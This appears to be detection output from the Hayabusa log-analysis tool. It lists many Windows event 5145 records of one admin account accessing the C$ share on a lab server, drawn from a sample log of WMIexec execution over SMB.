2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
